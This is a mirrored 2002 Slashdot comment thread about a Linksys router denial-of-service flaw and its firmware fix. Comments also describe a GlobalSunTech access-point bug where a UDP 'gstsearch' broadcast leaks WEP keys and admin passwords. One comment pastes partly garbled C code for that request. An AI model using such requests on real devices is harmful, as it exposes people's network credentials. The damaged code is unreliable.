Slashdot Mirror
Vulnerability In Linksys Cable/DSL Router
ispcay writes "Yahoo has published an article on a Linksys vulnerability. An easily exploitable software vulnerability in a common home networking router by Linksys Group could expose thousands of home users to denial of service attacks, according to a security advisory issued by iDefense, a software security company." The article's kinda sparse on details, but does mention that the vulnerability is fixed in the latest firmware release. Upgrade 'em if ya got 'em!
I use netgear :)
Not to say that something like this won't happen to netgear. Plus you have to be concerned about those companies putting backdoors in for the NSA.
after everyone who knows what they are doing flashes their firmware, 99.9% of routers will remain vulnerable...
I hold a patent on sigs...
check Popular Linksys Router Vulnerable to Attack
on eWeek also
According to the article, if you have remote management turned off, then people out on the internet can't use the exploit against you.
If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.
.
There were days I couldn't even reach downstairs with the damned thing. .
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Don't most of the router/firewalls Linksys sells run GNU/Linux as their embedded OS? I seem to remember reading an article in linuxjournal that said as much.
I am sure not a single hacker out there is going to investigate if Hillary Rosen has upgraded her software, and if they did so, it would only be to test her system, due to concern for her security and to warn her of possible problems.
---
When you come to a fork in the road, take it! --Yogi Berra--
It's a 4 port home router - who's going to wage a DOS attack on a piddly $50 home router? And even if they did - just reset the darn thing. No big deal. I would only get the patch if this problem happened repeatedly.
Or am I missing something?
From the e-week article, all you have to do is disable remote admin, which is the default setting, which you should have confirmed anyhow. Duh.
No firmware flashing needed.
political_news.c: warning: comparison is always true due to limited range of data type
While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru.
--CTH
--Got Lists? | Top 95 Star Wars Line
http://www.linksys.com/download/default.asp
While I have a linksys router, this still does not concern me. All I have to do, is unplug it, and plug it back in. Net' access restored. I don't know of any home users who need 100% uptime internet access. I suppose there are some work at home people who might need it. But personally, I have enough problems with AT&T cables fluctuating speeds then I would with my router crashing.
This only affects you if your router has 'remote management' enabled. Since so few people need this, and those that do are more technically minded, this shouldn't be much an issue. The worst this flaw can cause anyways is for the router to crash. The software in there sucks. My linksys crashes if it can't find a dhcp server, that a simple cgi script error crashes it is nothing new to me.
Photos.
It looks like in order to cause the crash you have have remote management enabled. Why on earth you would allow your router to be configured from outside on the internet boggles my mind. I would assume that this feature would be disabled by default, but then again who knows. I've owned a few cheap routers before and in order to use remote management you had to be connecting from an internal ip address, along with not coming through the wan port.
Just my 2 cents.
Devices like linksys suffered from a much larger security problem. IGNORANCE! Highspeed access in the home has broght about a whole new type of internet user. The type that doesn't log off. Lets be honest, many of us are lazy. We know what we are doing but still lazy. Then there is the other group, not lazy, but they don't know what they are doing. The security issues that go along with Mulitple machines, always connected to the internet without ANY protection (Node firewalls like norton internet security for example or virus protection, i don't need to give an example of that) far exceed any "NEW" issues that may now exist becuase of a flaw in this product. Education!!! Plain and simple will reduce any threat that this flaw or any other would exacerbate.
Here is the location of the Linksys BEFSR41 firmware upgrade utility v1.43 released Sept 4, 2002. Its the newest one I could find.
I have one of these, and the remote administration isn't enabled by default.
So for Aunt Tilly, there's no real danger unless the malicious person is on the network.
Anyone remember the Bud Ice commercials? "...I REPEAT! THAT CALL WAS PLACED FROM INSIDE THE HOUSE!!"
I upgraded by BESFR11 and it used the same firmware update as the *41 (4 port switch model) so its pretty safe to assume this version is vulnerable as well.
The firmware updates can be had here:
http://www.linksys.com/download/firmware.asp
I was looking for a link to thier page since i am lazy. No one posted one yet, so here is one for all the other lazy people like me:
http://www.linksys.com/download/
--- Sig test. 1...2...3...
Unless you've got your router setup to allow you to configure it remotely (ie: on the cablemodem side of the network; aka, while you're at your friends house). If you've done this, odds are this problem is the least of your concerns.
And there's already a firmware fix for it, should you be concerned that any script kiddies living in your house will want to hose their connection to the outside world...
How many people that own these routers will actually update the firmware? Or how many even will know that their router has a problem. I know several people with Linksys routers and I know if somebody doesn't tell them to update something, they won't update it on their own. Even if the people who know how to update their routers and know that there is a problem update them, that still leaves the majority of users in the dark. Not a good idea.....
Firstly, my router (SMC, not linksys) crashes on it's own every now and then.
It's consumer grade gear, people are probably used to turning them off and back on again anyway. And it's not like the main computer is affected.
Secondly, the attack has to originate on the inside network. It's not like the script kiddiz can take out these box en masse by blasting out a load a packets. Once you visit a malicious site - if there even is a real one - you'll soon learn not to go there again.
When will the media realize that not all DoS attacks are DDoS? DDoS is when the attacker gets a bunch of machines to all send data to the target machine, causing the target to run out of resources to handle all connections, swallowing the legit traffic in the process.
"Normal" DoS is what this is - crashing the target. For example, an old flaw in Wu-FTPD allowed a core dump - crashing the deamon and creating a DoS to anyone who needs it. All it took was a malformed request during a session. One machine required, not many.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Wierd or what...
I've spent this evening trying to sort out why the router goes belly-up after using eDonkey for a while. The problem started a week ago, but since then the occurences were more regular. I just upgraded the firmware an hour ago!!!
I have the BEFSR411 and found a decent forum link with the same problem... and there is another link of info/problems here.
I suppose it goes without saying that updating the firmware is a good idea... at least there are more improvements to the web-config interface. I'll just have to see how long the connection stays up.
Are you local? There's nothing for you here!
1) most users have not changed the default admin password from 'admin'
2) this is only a problem on the inside network.
I hate Linksys. I have that router, and it kept crashing on me. Changed the cable, everything, etc. Nothing. Even thought it was the cable modem for a while (would lose net access, but I finally found out the router wouldn't accept internal pings either). They sent me a new one (made ME pay for shipping), and it did the same thing. Tried all firmware versions, nothing.
Well, guess what. When you fire a bunch of UDP packets at it, the NAT routing table overflows and the router crashes (it happens faster if you have your DMZ host address set to a nonexistent address on the network), only to reboot itself in a few minutes. This has been tested and proven, but Linksys' response to me is "it's your software firewall, sir, you shouldn't run both at the same time." What a bunch of ignorant assholes. I informed them of the routing table overflow bug, but they ignored me.
Now, this bug shouldn't really affect anybody cause you really shouldn't run remote admin on your router, but with their shoddy firmware, it doesn't surprise me in the bit!
If anyone hears reports of the '41 being subject to ME or XP attacks, please post. For now...well... I've never been afraid of a couple of backslashes or a c:\.
- If we aren't supposed to eat animals, then why are they made out of meat? - Steven Wright
remote management is disabled by default, and the option to enable it, is under the "advanced" tab.
And one reason to have it turned on, is if it's your responsibility to manage the router, and it's easier to connect to it remotely, than talk someone on the LAN through adjusting it over the phone....
now that I think about it, probably the major thing you'd change on the router, is the information you need to connect to your ISP, and with the wrong/outdated info, the router won't be on the internet in the first place.
------ Work is so much easier when you don't
The following showed up on the NetStumbler site yesterday:
- GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup phase showed a security problem.
-
- WISECOM GL2422AP-0T
- D-Link DWL-900AP+ B1 version 2.1 and 2.2
- ALLOY GL-2422AP-S
- EUSSO GL2422-AP
- LINKSYS WAP11 v2.2
(And I just got a WAP11, dammit.)Sending a broadcast packet to UDP port 27155 containing the string "gstsearch" causes the accesspoint to return wep keys, mac filter and admin password. This happens on the WLAN Side and on the LAN Side.
Systems Affected:
Vulnerable, tested, OEM Version from GlobalSunTech:
Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
In other news, JWZ's DNA Lounge is having troubles with their Linksys WAP11-based wireless link, which is their only connectivity right now.
- "...the best sustained throughput they can handle is on the order of 64k."
Ouch.(They lost their T1 due to XO's bankrupcy and above.net closing a facility. Another T1 is on the way, but it'll be a couple weeks...)
"...America's great minds of today, teaching America's great minds of tomorrow. Poor bastards." -- A Beautiful Min
'cause I was thinking of buying one.
Also - which wireless PCMCIA (or whatever the acronym is) is a good one?
Is encryption turned on by default on these things?
This boggles my mind:
The 4-port DSL router (vulnerable) is using firmware 1.40something, and must be upgraded. The latest is 1.43.
The 8-port model, which is what I have, and which is exactly the same damn thing (same functionality, same interface, almost the same user manual) except that it's a few inches wider and has 4 more ports, uses firmware 2.something. And is apparently not vulnerable.
Providing another 4 ports (one extra bit?) requires the firmware to be that different?
You cannot apply a technological solution to a sociological problem. (Edwards' Law)
When I ran the following code, which is designed to return the wep key, admin username and password on my linksys befsr41w. It hard locked. I tried it again. Same thing.
(the befsr41w is less common, it's like a befsr41 with a pcmcia slot so you can upgrade it to support wireless networking)
here's the code
#include
#include
#include
#include
#include
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}
Nuff Said. I'm dissappointed in Linksys.
Remember that you are unique, just like everybody else.
This is old news all. Basically you could use SNMP to turn on the remote management (e.g. use web interface from the WAN side). Then once you had web access you could do anything the web interface would allow. They fixed this how long ago? PS There is a new release of the firmware postdating the article (1.43). Some moderator was in a hurry and posted FUD.
It wouldn't take much to flood a DSL line with enough traffic to render it useless, no matter what router is on the home user's end. Only the ISP's routers could block a DoS attack like that.
What a lame report! The sparse on details is that the remote management feature is not enabled by default. Well, doh!, if I turn on remote management someone can get in and affect my system (particularly if I don't change the password). Imagine that!
I'm an American. I love this country and the freedoms that we used to have.
http://www.linksys.com/download/
This comes under the "Duh..." category. Why would anyone allow Remote Management Access on their router (or computer, for that matter) without a specific need for such a functionality and additional safeguards in place? Oh, I suppose that possibly the firmware had RMA "on" by default ....
Here is a mailing list archive or yet another redundant reference of this problem. It's almost a year old. Come on slashdotters, don't get sloppy in the deluge huh?
I just went around the fucking merry go round with linksys's wpc11 pcmcia card. What a flaming POS! The card was flimsy, the drivers flat out didn't work, and when I called the techsupport line the lady on the other end of the line in buttfuck India was clueless... AVOID ANYTHING LINKSYS!!! I switched to a netgear (ma401 iirc) wireless card and it Just Worked. No fuss, no muss.
What you're all forgetting is, this is only an issue if you have remote management enabled, and it's not enabled by default...
(Seriously, does anyone read a thread before they post anymore?)
I'm glad they posted this. Eventually I'll go over to my mom's house and upgrade her firmware. I can't really see her crashing her own router... well, not on purpose, anyway. She might by accident trying to go to Yahoo! (which is what she calls whatever browser she happens to be using, unless it's AOL. No, not net savvy.)
Don't you wish your girlfriend was a geek like me?
Thank god I got a SMC router instead of a Linksys!
Does that mean that my win2k, winXP and win98 machines are safe now?
-- Andy
LinkSys only offers a specialized Windows firmware upgrading tool. The router itself has a Java applet that it supposed to work, but didn't for me in Mozilla 1.2b or IE 5.2.2. A friend directed me here. It has instructions on how to upgrade the firmware in Mac OS 9/X using their specialized tool. I worked for me.
In one firmware update last year, the "WAN UPDATE" setting was defaulted to yes. This would enable anyone to connect to a linksys router and update the configuration to their hearts content, or write a script to scan through an IP range and automate it.
= tp c&s=50009562&f=469092836&m=5300962863
I reported this to linksys, they quickly gave me another firmware update, but other users reported the same thing.
http://arstechnica.infopop.net/OpenTopic/page?a
fslg503-985-8686503-985-8686503-985-8686503-985-8
Linksys firmware since February 2002 has been reasonably decent. Early versions would crash about once a day in normal operation.
Avoid FORD, get a Chevy. I had a Ford break down once...
Avoid Chevy, get a Ford, I had a Ford break down once....
Maybe it is the driver? Maybe if you buy the WORSE model Ford or Chevy makes you have problems? Brands don't mean crap. You have to get _specific_ on which model, which version of the Linksys, etc.
Opinions?
Many other products both software firewalls (i.e. for Windows) and hardware routers (i.e. my D-Link) include an option for remote admin.
If users were to enable remote admin on these products, would they not be just as venerable too?
It seems to me that home products may not require the remote admin feature. I never use mine, and I'm still alive!
It's not all the urgent for me, since however idiotic I might be, I made doubly sure when I set the thing up that remote management was disabled. Imagine all the "http://admin:admin@address/" attempts there'd be otherwise.
Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
Yes, there's a DoS possibility in the Linksys routers. It's fixed in the 1.43 firmware release. Anyone who reads the Linksys forum at DSL Reports has known about this for weeks!
Slightly on-topic can anyone tell me what vulnerabilites exist if you are running a DSL router using NAT but no firewall ?
I have a small to fair amount of TCP/IP knowledge and at the moment my thinking is that you are only really vulnerable to DOS attacks.
I mean, if you aren't forwarding any ports then the only time there is a chink in your armour is when you have a temporary alias set up for a connection, which will be one port on one of the machines on your LAN. This alias won't last for long, and it will be on a port you're using for getting out, e.g. port 80,125... and you'd probably have to set your firewall up to allow this through if you ran a firewall.
Normally if a packet comes in to your sole external ip address and you haven't set up any port forwarding (or you have but it's not one of the ports you want to forward), the DSL router will just drop the packet.
Can anyone please clue me in on the vulnerabilities of using NAT alone and no firewall ?
graspee
I saw this happening on my router about three weeks ago... lights freaking out blinking... in other words a lot of traffic going through... Hit the good ole netstat -n and the spoofed IP adds were from get this... IANA.org What a sense of humor! Went through a bout of paranoia updated all my hardware firmware and other crap... Called Comcast told them about the DoS attack... of course they didn't care...
Still a great piece of hardware.
I think this is the first or one of the first times we hear of one of these small router/NAT devices having vulnerabilities. This one is not very serious as it will only crash the device rather than allow someone to gain access to the network, but both this and other devices may have holes that would allow hackers to gain access to home LANs.
This could be a serious problem in the coming future with these small routers/NATers being combined with wireless APs for everyone to use AIM from the couch. Great and all but people wiht these things are probably going to bother even less with security than they do now, thereby introducing a whole host of nastly little attacks.
This should be interesting to watch for.
The default Linksys in the article has 4 ports, true, but they can actually support 254 clients if you connect them to a switch. Furthermore, the BEFSR11 is a one-port, designed to be connected to a switch or hub, and has proven very popular in labs of anywhere from 10-30 workstations, although it can actually support up to 254 clients. Consequently, there are those out there who may get a sick kick out of kicking schools, non-profit organizations and other institutions offline.
The BEFSR11 is truly cool. $50 gets you a box that barely draws any power and routes requests quite nicely for 254 machines and functions as a DHCP server to boot. Practically maintenance free. Most of mine already have upgraded firmware, but you can bet that I - and several other admins who oversee non-profit and educational sites - will be busy checking firmware versions for a while.
To cause a crash, an attacker only needs to enter the URL (uniform resource locator) for a CGI (Common Gateway Interface) script used to configure and manage the router without providing any "arguments" (input for the script to process), according to iDefense.
>Brands don't mean crap.
Because, hey, the only Lada that sucks is all of them.
If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
I have 2 WAP 11's bridging a T1 line over 1600 feet. They've worked perfectly for over 6 months and have never been rebooted or reset. Paid for themselves a couple times over. Consistent 1.4Mbps all the time. Sorry about your problems.
"Eve of Destruction", it's not just for old hippies anymore...
I had an early post in this thread pointing out the popularity of this router in non-profit and educational settings to run labs - since this router is vulnerable to this attack from the inside or outside, (outside only if remote management is enabled), it should still be patched - because even if remote mgt is disabled some idiot delinquent on the inside can bring down the whole facility just by cutting & pasting into the URL of their browser if they are behind the router. I support several labs that have people silly enough to do just that for kicks.
Wouldnt it be nice if the remote management actually allowed you to remotely manage the router/modem, to be able to flash the firmware - the name does seem to suggest that. That way, everyone who was vulnerable, would be all those who could be immediately fixed.
I.O.U One Sig.
Referenced file
The way the term DOS is used in this article is misleading. By executing this attack, the attacker causes the user of the router to be denied service. But unlike DOS as in the usual sense, there is no way for that connection to then be harnessed in a traditional denial of service attack on remote servers such as yahoo, ebay, etc. This should hardly be considered a DOS attack, since the effect is so localized, whereas a DOS attack generally is large-scale in its effects.
And why in God's own bumfucking earth would you run a crappy router like this in a LAB? Seriously, you can get a decent 8-port switch for under fifty bux, grab a 486 at goodwill (frequently for free, as nobody wants a 486 anymore except cash-starved K-12 net admins looking for cheap routers), toss in a couple of old nics, write five lines of iptables, and guess what? You have a hell of a lot more secure NAT solution for your lab than a crufty plastic home gateway router. Assuming you don't let the kids see your root password. Don't get me wrong, I like my BEFSR41, but no way in hell would I ever use it outside of my house.
political_news.c: warning: comparison is always true due to limited range of data type
Sending a certain string over a certain UDP port will cause the AP to return the WEP key, mac filter settings, and admin password over the WLAN and LAN side.
Exploit can be found here
Makes me glad to have bought an Apple Airport for a change.
I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
If you've seen slapper in action, you know this is true. A host behind the router gets infected by the slapper.* worm, and first thing it does (after building itself a new home) is start probing subnets for others. It finds friends, they talk, and much traffic ensues.
The Linksys can stand maybe 6, maybe 10 hours of that much UDP traffic before it reboots. Since the traffic is still coming in when it comes back up, it runs about a 10% chance (guestimate) of restarting successfully. It hangs otherwise. Power cycling restores functionality, and resets the inevitable cycle.
I don't think it's a fault of Linksys. They have a product aimed at a certain market; judging from its popularity it does quite well there. If you have special needs beyond the average SOHO user, you need either an SDK or another vendor.
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The third reason is that Block WAN Request is enabled by default. This is how these routers make themselves invisible to the web: they just drop the packets that come from outside. This can be combined with opening a specific port (forwarding), in which case the traffic on that port is directed to a SPECIFIC machine on the LAN.
The Lazy Way to deal with this is to turn remote management off. If you have no problems, leave it alone until you have some other reason to flash it.
BTW, the last firmware upgrade on the "41" works great with WinXP UPnP. Fairly easy to set up safely (update Windows), and it lets me put my dad behind NAT and still fix his system remotely using XP Remote Assistance. It actually works, much to my amazement, and AFAIK, there are no serious vulnerabilities if it's done right.
1.43 seems to still have a bug where the uPnP forwarding page doesn't load properly. Linksys' "fix" for BEFSR41 v1 owners is to load the FORMER version of firmware which doesn't have uPnP which is apparently susceptible to this vulnerability. (Note: I have remote management turned off, please don't waste time trying to hax0r me.)
As a result I am never buying another linksys firewall product nor am I suggesting them for others. I'm hoping that someone will bring out a mini itx with dual ethernet soon so I can cheaply build a very small linux-based replacement for my linksys box. (IE, which runs off a small power supply.) I have a 2 gig laptop disk just sitting waiting...
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
If I can't see under the hood (who says I'll understand everything I'll see though), I tend not to trust things like this, esp. when it comes to security. My good ol' linux router on a P90 suits me just fine and I can do so much more with it. I don't see me owning one of these ever, so I don't have to worry. :)
"There is no patch available for the problem at this point, but firmaware version 1.43 fixes the problem."
And what the hell is eWeek doing writing about 'firmaware'?
heh
Just to play devil's advocate... it works for me.
I used to run a linux NAT box to act as the first line of defense on my home network, and it worked for months and months without EVER needing to be tweaked or cuddled.
When that box got cannibalized for a greater good, I needed something else... enter the Linksys router box... plug it in, enter your settings, and off you go. No fuss, no mess.
Hey, I like to tinker with my computers as much or more than the next guy, but there's only so many hours in the day, and my spouse was getting tired of my endless tinkering with the network. Of course, we also had a baby around the same time; some things are more important than running the ultimate 1337 Linux firewall/router.
Whoops... I just stated that something is more important than computer tinkering...
What the hell... it's only karma
Even if a man chops off your hand with a sword, you still have two nice, sharp bones to stick in his eyes.
Sparing all that has been said on this, I have 2 points:
1) RTFM. I turned off remote admin on my router within 10 minutes of hooking it up. Yeah, I also changed the admin password. Duh. If people are too dumb to do that, its their problem.
2) This "new" firmware has BEEN OUT FOR ALMOST TWO MONTHS.
Checking for new firmware is almost standard practice for Linksys owners -who have some clue. Thus, I've been running on this supposed "new" firmware for a while now, long before the media jumped all over it (and like a virus, I see it hopping from one media outlet to another to another and it seems NONE of them are independantly checking the facts of the story.)
Summary: This issue is about a problem that should not exist which in any case is solved by a "new" firmware upgrade that's not actually "new."
Thank you media.
I own this product, so have decided to upgrade the firmware. Since I'm running Debian, I clicked the "Other Operating Systems" link on the firmware download page, only to be presented with a ZIP archive containing a Windows executable! Is this some kind of sick joke?
If you own this router and you own IE 5 or above, please visit this upgrade page, substituting the IP of your modem for 192.168.1.1 [Default].
While these "DSL routers" and other various "consumer grade" networking products have popped up like dandelions in spring, so have the problems.
;-)
My first venture into the fray was with an XSense (formerly MacSense) Xrouter. It was their variation on the "cable router" scene, for what is really more properly named a NAT box. It seemed to handle the fileserver well and port mapping was working fine. For their credit I'd also like to say they have some of the most impressive event logging I have ever seen, even recognizing attacks and identifying them by name. Then I tried to run a traceroute to an outside point to see how hop times were looking. Nothing.
"Maybe it's filtering my packets?" I think, and try to connec to its web administration page, but no response. Oops, my clients just lost connection to the servers they were attached to. And look, all the users are dropping off my server. What the...? It turns out that any attempt to traceroute out causes the router to reboot. It continues to reboot until you stop the traceroute, and then takes several seconds to unscramble its eggs before you get connectivity back.
I called up XSense and asked them what was going on, and if they had a firmware flash for me to fix it. Surprise, he reminds me that they did indeed ship their own traceroute program with the router, and I should use that. I run it, and surely enough, no crash. Tried every other traceroute app I could find, and every single one crashed the router except theirs.
The words known issue float through my head. I bickered a bit with the rep about how NO app I (or any of my users!!!) runs should be able to crash my NAT. End result, they don't care. Got off the phone with them and called up the vendor, they're like "here, let me get you the manufacturer's support number". "Nope, they told me tough luck they know about it and they don't care." "Oh... let me get you an RMA."
I actually ended up exchanging it for an Asante FR4003, which has worked flawlessly ever since. It gets a bit warm, so I keep it elevated so the metal bottom plate gets some convection. (it really should have some ventillation slots) And they've updated their firmware twice now, once both times including suggestions for improvements that I sent them. Very solid product. Interesting people answering their tech support though, I got a bit agitated one time when I was doing something stupid and got a big argumentative with them... that's the only time I've ever had a customer support rep tell me to "shut the hell up and listen for a minute!" but maybe that's what I needed to hear at the time...
I work for the Department of Redundancy Department.
I mean christ, their webpage is falling apart, sure Addtron routers may not be as flashy as Netgear or Linksys brandwise, but damn, it can't be *that* hard or *that* costly to maintain a site well enough to get the firmware updates that people need.
At least there are brand's that try to take care of their customer's concerns. Yeah i know a homebrew linux router would do the trick, but i paid good money for this router and they give me an unusable site for support in return.
A Penny for my thoughts? Here's my two cents. I got ripped off!
I love it how slashdotters bitch and complain about anything vaguely microsoft.
.doc readers.
(sarchasm)
Linux
OpenOffice.org, StarOffice, anyone?
Actually you CAN upgrade one from Linux. Remove the password and then use tftp. Their mutant Windows tftp has been modified to send the password, which isn't part of the TFTP protocol. But if the password is null the normal tftp works just fine. I have upgraded mine (I have the BEFW1S4 with the wireless included) twice in the approx two years I have owned it and I don't do Windows.
Democrat delenda est
I used PPPoE with a Linksys & BellSouth DSL for better than a year without any problems. What's your bitch with it? And DSL != PPPoE. I'm now of DirectvDSL and they are a super clean pipe. While I have to use their router to get my static IP, while waiting for it to arrive I had an Alcatel Speedtouch Pro in dumb bridge mode doing plain vanilla DHCP on the Linksys. Just depends who you get service from.
Democrat delenda est
Cisco 806 Router Nat+firewall "Exec timeout 0" in exec mode The most insecure thing in my network is the modem, and the boxes running win2k. And people do try to break in, I have logs. Using various exploits including buffer overflow, and fail miserably each and every time. But as for my buddies running linksys routers...they are about to get a real treat > : )
Candy-Coated Knowledge
C'mon guys, if someone is smart enough to purchase a router and know how to use it, they'll flash the firmware.
Could you please post your five lines of iptables?
Thank you.
.
.
== WolfriderV6 == I'm willing to admit that *I just might* be wrong... Are you??
That exploit returns an assuring null, at least on firmware 1.42.7, Apr 23 2002. BTW, the code on the netstumbler site has large chunks of it eaten by html-izing it. The original can be found in this PDF file. here
OK, I know I'll be shunned for this...but...
Over the years I've had several Linksys and Netgear routers fail. I got tired of that and decided to try something new. Since I wanted good UPNP support I grabbed one of the new Microsoft routers. I'm not sure who actually makes them, but I figured they had good keyboards and mice, right?
The router is VERY nice. The interface is the best of the bunch, by far. While the Linksys never showed up as a UPNP device on my network (even with upgraded firmware and UPNP enabled) the MS router did. It also has a very simple setup procedure for a new user so they could get a whole network going in a few minutes with no confusion. I've also read that their wireless NAT routers will NOT let you run without WEP enabled and it makes it real easy to enable it. It rights the key to a floppy that can be put in the client workstations to get WEP going.
Tsk tsk tsk.
How sad is that?
-- Karma whore? You betcha. --
...firmware fixes the problem"
???
How ELSE could the router be patched?
Anyone else notice that there were some pretty substatial price drops, including from mail in rebates, in this router about two months before this announcement? I did, because I bought it during that wonderful drop.
"Linksys, based in Irvine, California, could not immediately be reached for comment."
Hi,
;-)
My BEFSR11 router was zapped from the unknown about five weeks ago. It simply stopped passing traffic.
I checked everything else then tried the router. It would not accept my password. I verified it, then tried again, but this time I noticed that it identified itself as a "LinkSic" router, instead of a LinkSys.
I powered down and restarted and it came back as itself. When emailed LinkSys about it, they seemed to know about it but said they hadn't seen it before. (??)
Things are sucky when you need a NAT'ed router to protect your NAT'ed router
Linksys suffered from an identical problem last year as well...I think they keep futzing up their firmware or something.
Quoth the article...
An attacker could just scan a (network) subnet for IP addresses belonging to Linksys routers.
The IP addresses for most users are assigned by their providers, not Linksys. The only thing I can think of that would give the router away would be the MAC address, but that is only available on the local segment, not to the internet at large, correct?
If this is the case, then "hackers" would have to scan every IP in a subnet because there is no way to determine if a particular IP number is connected to a Linksys router.
Couple this with the fact that the remote access feature is disabled and the threat is reduced.
About the only credible threat would be receiving an HTML email with the default local IP number in it. This would probably get most users since the average person is going to design their home network around their router defaults. When they view the email, the request goes to the router and takes it out of service.
Better upgrade that firmware.
Remember, You are unique...just like everyone else.
Ooh. I've always wanted an opportunity to do this, particularly when it's so well deserved.
RTFM
political_news.c: warning: comparison is always true due to limited range of data type
In a related, underpublicized story, Linksys's WET11, which has been getting a lot of buzz as a cheap wireless ethernet bridge, has a firmware flaw which allows a DoS. LinkSys has been slow to come out with a fix.
What.....like this:
--an unbreakable toy is useful for breaking other toys--
It's impossible to overflow the NAT table with UDP packets on a few sessions. The NAT table keeps one entry per session, not one entry per packet. If I make a connection to a server and get a stream of a trillion UDP packets, that's one entry in the NAT table used to map the session. You would need to sustain 520 sessions to fill up the NAT table.
They say that the router has a 512KB memory buffer, but I'd assume they meant to say that it has 512KB of memory. Most of that memory is probably filled by the OS and settings. I wonder how much memory is actually devoted to the NAT table.
It also CORRUPTS data within the network. I was running apache on my system and when i accessed it with loopback (or from any other computer on the network), the pages would come back garbled in some way half the time. It did this for people outside the network too on early versions of firmware, but they fixed the outside problem. I guess they didnt bother to check inside. When I plugged the system straight into the modem, problems disappeared.
After getting no support (box says '24/7'...I tried 8 times for a total of 16 hours worth of being put on hold) and no returned emails, I kicked this piece of shit to the curb and bought a Netgear.
Havent had a problem since. Spend the extra $20 and buy a netgear.
-
Maybe they had a bad run of the things early on? I got mine a few months after they first appeared (March 2000 i think was the original firmware date) It wouldnt surprise me if they cut corners to keep them $20 under competitors.
-
Here is some of my firewall data that was captured yesterday. The attacker attempt a UDP port probe and then launches ICMP unreachable storms against the router in an attempt to create a DoS.
I did have remote management turned off (thank goodness) I did notice a series of slowness, but that was wacked after I refreshed my IP.
Notice the repetitive addresses.
Time, Event, Intruder, Count
11/06/2002 11:03:13 AM, ICMP unreachable storm, 80.146.102.92, 1
11/06/2002 11:03:11 AM, ICMP unreachable storm, 80.143.254.46, 1
11/06/2002 11:03:11 AM, UDP port probe, h24n2fls33o985.telia.com, 47
11/06/2002 11:03:10 AM, ICMP unreachable storm, h24n2fls33o985.telia.com, 1
11/06/2002 11:03:10 AM, UDP port probe, h24n2fls33o985.telia.com, 36
11/06/2002 11:03:09 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 2
11/06/2002 11:03:09 AM, UDP port probe, h24n2fls33o985.telia.com, 5
11/06/2002 11:03:09 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:09 AM, UDP port probe, h24n2fls33o985.telia.com, 2
11/06/2002 11:03:08 AM, ICMP unreachable storm, 147.102.101.42, 1
11/06/2002 11:03:08 AM, UDP port probe, 0.0.0.0, 30
11/06/2002 11:03:08 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 5
11/06/2002 11:03:08 AM, UDP port probe, 24.130.165.71, 4
11/06/2002 11:03:08 AM, UDP port probe, 0.0.0.0, 16
11/06/2002 11:03:08 AM, ICMP unreachable storm, 61.10.170.189, 1
11/06/2002 11:03:08 AM, UDP port probe, 172.176.252.14, 1
11/06/2002 11:03:08 AM, UDP port probe, 24.130.165.71, 10
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 8
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 7
11/06/2002 11:03:07 AM, UDP port probe, cpe-24-160-6-98.sw.rr.com, 6
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 9
11/06/2002 11:03:07 AM, ICMP unreachable storm, 24.130.165.71, 1
11/06/2002 11:03:07 AM, UDP port probe, 24.130.165.71, 3
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 8
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:07 AM, UDP port probe, 24.130.165.71, 1
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 4
11/06/2002 11:03:06 AM, UDP port probe, 24.160.6.98, 7
11/06/2002 11:03:06 AM, UDP port probe, 61.21.137.163, 6
11/06/2002 11:03:06 AM, UDP port probe, 24.160.6.98, 5
11/06/2002 11:03:06 AM, UDP port probe, 24.130.165.71, 4
11/06/2002 11:03:06 AM, UDP port probe, 68.81.7.227, 3
11/06/2002 11:03:06 AM, ICMP unreachable storm,
Linksys has great products....
5 3971~roo t=equip,16~mode=flat
But some like the BEFW11P1 need some help to prevent that aweful crash that occurs under high load.
See:
http://www.dslreports.com/forum/remark,44
All good for me. I have the BEFSR41 and the wireless version and they both work great. One thing I had a small problem with was getting encryption to work on the wireless. I was running NT and added the adapter from within the network settings which made it work, but only running the setup wizard gives you the program to set the WEP keys. Now it runs 128 bit (actually 104) like a champ.
/var/log/messages I beleive.
As for the card, I have the plain little Linksys wifi PCMCIA and it works great in NT and FreeBSD. BSD took a little playing with the pccard.conf - you have to change the section title to the exact card name read on boot - it appears in your
My next wireless nic will be the Orinoco gold because you can attach an external antenna to it (Pringles anyone?) and Airsnort works with it.
As for their other products, I have installed a couple of the cheap little switches they make for clients with no complaints, either.
One weird thing that happened a few weeks ago was the non-wireless version would not let me ping through to the cable modem for some reason. I ended up reseting to factory defaults and it cleared up. No biggie, though.
